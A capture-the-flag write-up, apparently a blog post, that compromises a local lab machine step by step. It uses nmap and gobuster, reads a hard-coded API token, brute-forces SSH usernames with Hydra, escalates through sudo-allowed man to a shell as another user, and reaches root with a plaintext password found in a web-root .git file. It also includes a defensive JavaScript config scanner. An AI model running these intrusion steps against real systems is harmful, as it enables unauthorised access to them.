OFUSKEIT MACHINE
┌──(rootkali)-[/home/luis/Descargas/ofuskeit]
└─# bash auto_deploy.sh ofuskeit.tar
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The full-port scan revealed that ports 22 (SSH), 3000 (API) and 80 (HTTP) were open.
┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p- --min-rate 5000 172.17.0.2 -vvv -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-20 13:36 CEST
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 13:36
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 13:36, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:36
Scanning 172.17.0.2 [65535 ports]
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 80/tcp on 172.17.0.2
Discovered open port 3000/tcp on 172.17.0.2
Completed SYN Stealth Scan at 13:36, 0.89s elapsed (65535 total ports)
Initiating Service scan at 13:36
Scanning 3 services on 172.17.0.2
Completed Service scan at 13:36, 11.04s elapsed (3 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.05s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.03s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000050s latency).
Scanned at 2025-09-20 13:36:15 CEST for 13s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
3000/tcp open http syn-ack ttl 64 Node.js Express framework
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.44 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
With the web service identified on port 80, the next step was to search for hidden directories and files. Gobuster was run with a common wordlist and a set of file extensions, as shown below, and it discovered an interesting file named /api.js. This finding suggested the existence of a login check that could be a target for a vulnerability.
┌──(root㉿kali)-[/home/luis]
└─# gobuster dir -u "http://172.17.0.2/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x bak,txt,php,tar,js
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: bak,txt,php,tar,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/api.js (Status: 200) [Size: 494]
/javascript (Status: 301) [Size: 313] [--> http://172.17.0.2/javascript/]
/script.js (Status: 200) [Size: 1916]
Progress: 1323342 / 1323342 (100.00%)
===============================================================
Finished
===============================================================
Browsing to the site at this URL showed the home page, and the other discovered paths returned either forbidden pages or further home pages.
Since api.js was discovered, the next step was to request it directly and inspect its contents:
└─# curl http://172.17.0.2/api.js
const express = require('express');
const app = express();
const PORT = 3000;
const tokenValido = "EKL56L4K57657JÑ456J74K5Ñ6754";
app.use(express.json());
app.post('/api', (req, res) => {
    const { token } = req.body;
    if (token === tokenValido) {
        return res.send("✅ Acceso concedido. Contraseña chocolate123");
    } else {
        return res.status(401).send("❌ Token inválido.");
    }
});
app.listen(PORT, () => {
    console.log(`🚀 API activa en http://localhost:${PORT}`);
});
Since the file hard-codes the valid token, the next command sends it in a JSON POST to the API on port 3000 in order to obtain the message ✅ Acceso concedido. Contraseña chocolate123, as you can see below.
┌──(root㉿kali)-[/home/luis]
└─#curl -X POST -H "Content-Type:application/json" -d '{"token":"EKL56L4K57657JÑ456J74K5Ñ6754"}' http://172.17.0.2:3000/api
✅ Acceso concedido. Contraseña chocolate123
Since SSH is open on port 22 and we now have a password but no username, Hydra was used with a username wordlist and the fixed password to find the user it belongs to, as you can see below.
┌──(root㉿kali)-[/home/luis]
└─#hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p chocolate123 ssh://172.17.0.2 -f
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-20 13:49:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: admin password: chocolate123
[STATUS] attack finished for 172.17.0.2 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-09-20 13:49:57
Gotcha! The credentials are:
- Username: admin
- Password: chocolate123
Now we log in over SSH with these credentials, using the command you can see below.
┌──(root㉿kali)-[/home/luis]
└─# ssh admin@172.17.0.2
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:TiwXpOsqzY3iXCsLthm55nRfroyY7zk3fOjQi0lA2fQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
admin@172.17.0.2's password:
Linux 0417788a875e 6.12.38+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.12.38-1kali1 (2025-08-12) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
admin@0417788a875e:~$
admin@0417788a875e:~$ sudo -l
Matching Defaults entries for admin on 0417788a875e:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
In addition, running sudo -l reveals the privilege escalation path, which takes the following steps:
- sudo -l (to list the commands admin may run with sudo)
- sudo -u "balulito" /usr/bin/man ls (to abuse that entry: man opens its output in a pager, and typing !/bin/bash at the pager prompt spawns a shell as balulito)
User admin may run the following commands on 0417788a875e:
(balulito) NOPASSWD: /usr/bin/man
admin@0417788a875e:~$ sudo -u "balulito" /usr/bin/man ls
!/bin/bash
Gotcha! We have pivoted to another user.
admin@0417788a875e:~$ sudo -u "balulito" /usr/bin/man ls
/usr/bin/man: can't set the locale; make sure $LC_* and $LANG are correct
balulito@0417788a875e:/home/admin$
balulito@0417788a875e:/home/admin$ ls
ls: cannot open directory '.': Permission denied
balulito@0417788a875e:/home/admin$ cd ..
balulito@0417788a875e:/home$ ls
admin balulito
balulito@0417788a875e:/home$ cd admin/
bash: cd: admin/: Permission denied
balulito@0417788a875e:/home$ find / -perm -4000 2>/dev/null
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/mount
/usr/bin/chsh
/usr/bin/umount
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
balulito@0417788a875e:/home$ cd ..
balulito@0417788a875e:/$ ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
balulito@0417788a875e:/var/www/html$ ls
api.js index.html node_modules package-lock.json package.json script.js style.css
balulito@0417788a875e:/var/www/html$ ls -la
total 64
drwxr-xr-x 3 root root 4096 Jun 1 08:32 .
drwxr-xr-x 3 root root 4096 Jun 1 08:10 ..
-rw-r--r-- 1 root root 318 Jun 1 08:28 .git
-rw-r--r-- 1 root root 494 Jun 1 08:32 api.js
-rw-r--r-- 1 root root 2129 Jun 1 08:13 index.html
drwxr-xr-x 68 root root 4096 Jun 1 08:23 node_modules
-rw-r--r-- 1 root root 27001 Jun 1 08:23 package-lock.json
-rw-r--r-- 1 root root 265 Jun 1 08:23 package.json
-rw-r--r-- 1 root root 1916 Jun 1 08:15 script.js
-rw-r--r-- 1 root root 2270 Jun 1 08:13 style.css
balulito@0417788a875e:/var/www/html$ find / -name .* 2>/dev/null
/var/www/html/.git
balulito@0417788a875e:/var/www/html$ cat .git
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/empresa/mi-app-segura.git
fetch = +refs/heads/*:refs/remotes/origin/*
[user]
name = balulito
email = admin@empresa.com
password = 'this is top secret'
balulito@0417788a875e:/var/www/html$
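The .git file above holds a plaintext password under [user], and it sits in the Apache document root, where any unauthenticated visitor could have fetched it as well. As an added example, not part of the writeup, here is a small scanner for this INI-style git config format that a host audit or pre-commit hook could run: it parses sections and keys, flags credential-like keys and credentials embedded in remote URLs, and warns when repository metadata lives under /var/www. The key list, the sample config and the web-root path prefix are my assumptions.

```javascript
// Added example, not part of the writeup: a scanner for the INI-style git
// config format found in /var/www/html/.git. It parses sections and keys,
// flags credential-like keys and embedded URL credentials, and warns when
// repository metadata sits under a web root.
const CREDENTIAL_KEYS = new Set(['password', 'passwd', 'token', 'secret', 'apikey']);

// Parse git-config text into { 'section "subsection"': { key: value } }.
// Values are unquoted; full-line comments (# or ;) are skipped.
function parseGitConfig(text) {
  const out = {};
  let section = '';
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || /^[;#]/.test(line)) continue;
    const sec = line.match(/^\[([^\]]+)\]$/);
    if (sec) {
      section = sec[1].trim();
      out[section] = out[section] || {};
      continue;
    }
    const kv = line.match(/^([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*)$/);
    if (!kv || !section) continue;
    let value = kv[2].trim();
    if (/^(['"]).*\1$/.test(value)) value = value.slice(1, -1);
    out[section][kv[1].toLowerCase()] = value;
  }
  return out;
}

// One finding per problem; an empty array means the file is clean.
function scanGitConfig(text, path) {
  const findings = [];
  for (const [section, keys] of Object.entries(parseGitConfig(text))) {
    for (const key of Object.keys(keys)) {
      if (CREDENTIAL_KEYS.has(key)) findings.push(`${section}.${key}: plaintext credential`);
    }
    // scheme://user:pass@host remotes are the other common place secrets end up
    if (/^[a-z]+:\/\/[^/@]+:[^/@]+@/i.test(keys.url || '')) {
      findings.push(`${section}.url: credentials embedded in remote URL`);
    }
  }
  if (/^\/var\/www\//.test(path)) findings.push(`${path}: repository metadata inside a web root`);
  return findings;
}

// Constructed sample mirroring the layout of the file found on the machine.
const SAMPLE_CONFIG = `[core]
\trepositoryformatversion = 0
[remote "origin"]
\turl = https://github.com/example/app.git
[user]
\tname = balulito
\tpassword = 'this is top secret'
`;
```

scanGitConfig(SAMPLE_CONFIG, '/var/www/html/.git') reports both the user.password key and the web-root location.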
balulito@0417788a875e:/var/www/html$ su root
Gotcha! Entering the password from the .git file gives us root:
Password:
root@0417788a875e:/var/www/html# whoami
root
Thank you very much for reading this article
I hope you liked it and learned something new.
This article has been written for ethical purposes.
Good Hack